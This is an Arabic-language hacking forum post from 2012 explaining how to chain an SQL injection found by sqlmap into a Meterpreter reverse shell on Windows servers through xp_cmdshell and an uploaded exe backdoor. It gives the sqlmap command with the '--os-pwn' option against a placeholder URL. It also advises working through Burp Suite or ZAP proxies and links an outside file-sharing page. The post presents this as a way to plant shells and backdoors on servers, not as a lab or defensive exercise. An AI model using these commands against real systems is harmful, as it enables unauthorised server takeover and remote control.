SQLmap & Metasploit For Meterpreter

Cyber Cool · 12-11-2012, 02:27 PM

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاتة

اليوم بآذن الله بنعرف في حالة كانت في امكانية لرفع شيل على

السيرفرات ( ويندوز ) وتشغيل بايلود Meterpreter

طبعا هون التجربة على سيرفرات الويندوز بـطريقـة : Xp_cmdShell

وعن طريق باك دور بـ exe طبعا

على السيرفر الفكره وما فيها عبآرة عن آمر واحد

كود PHP:

cd /pentest/database/sqlmap

كود PHP:

./sqlmap.py -u 'http://www.site.com/index.php?id=1' --risk=5 --level=5 --os-pwn

يعني في حالت تم الحقن وفية امكانية لرفع باك دور

والاتصال العكسي بالسيرفر بهي الطريقة الي تشوفها

ولازم معظم الاوقات انك تستخدم بروكسي Brubsiute , Zap Proxy

وحفظ النتائج والحقن خلالها كما شرحت في موضوع سابق ْ

امامك والموضوع للمعلومية وبشرح تبين المعلومة آكثر واكثر

كود PHP:

http://www.gulfup.com/?9HhEAS

يالله لاتنسوني من صالح دعائكم

اتمنى لكم الفائده

كل ودي في امان الله